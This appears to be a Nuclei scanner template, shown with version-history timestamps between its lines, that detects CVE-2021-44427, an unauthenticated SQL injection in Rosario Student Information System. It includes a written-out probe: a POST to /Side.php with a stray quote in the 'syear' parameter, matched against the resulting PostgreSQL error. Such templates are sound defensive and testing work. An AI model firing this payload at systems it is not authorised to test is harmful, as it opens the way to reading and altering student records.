2021-11-30 15:56:38 +00:00
id : CVE-2021-44427
info :
name : Rosario Student Information System Unauthenticated SQL Injection
2021-11-30 17:53:31 +00:00
author : furkansayim,xShuden
2021-11-30 15:56:38 +00:00
severity : critical
2023-04-12 10:55:48 +00:00
description : An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
2021-11-30 15:56:38 +00:00
reference :
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
- https://twitter.com/RemotelyAlerts/status/1465697928178122775
2021-11-30 17:53:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-44427
2023-04-12 10:55:48 +00:00
remediation : Upgrade to version 8.1.1 or higher.
2021-12-01 13:42:24 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-12-01 13:42:24 +00:00
cve-id : CVE-2021-44427
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:*
epss-score : 0.00409
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,sqli,rosariosis
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-11-30 15:56:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-30 15:56:38 +00:00
- method : POST
path :
2021-11-30 17:53:31 +00:00
- "{{BaseURL}}/Side.php"
body : "sidefunc=update&syear=111'"
headers :
Content-Type : application/x-www-form-urlencoded; charset=utf-8
2021-11-30 15:56:38 +00:00
matchers-condition : and
matchers :
- type : word
2021-11-30 17:53:31 +00:00
part : body
2021-11-30 15:56:38 +00:00
words :
2021-11-30 17:53:31 +00:00
- "DB Execute Failed. ERROR:"
- "unterminated quoted string"
condition : and
2021-11-30 15:56:38 +00:00
- type : status
status :
- 200
2021-11-30 17:53:31 +00:00
- type : word
part : header
words :
- "RosarioSIS="